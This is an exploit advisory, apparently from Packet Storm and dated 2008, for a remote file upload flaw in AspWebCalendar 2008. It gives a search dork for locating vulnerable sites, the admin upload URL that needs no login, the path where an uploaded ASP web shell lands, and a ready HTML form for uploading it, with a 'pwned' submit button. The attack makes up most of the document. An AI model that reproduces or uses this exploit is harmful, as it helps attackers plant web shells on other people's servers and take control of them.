aspwebcal-upload.txt

2008-06-18T00:00:00
ID PACKETSTORM:67439
Type packetstorm
Reporter Alemin Krali
Modified 2008-06-18T00:00:00

Description

                                        
                                            `Title:AspWebCalendar 2008 Remote File Upload Vulnerability  
  
# Discovered by : Alemin_Krali   
  
# Dork :calendar.asp?eventdetail  
  
http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell  
  
http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address  
  
upload form  
  
<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>  
  
  
Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed  
  
`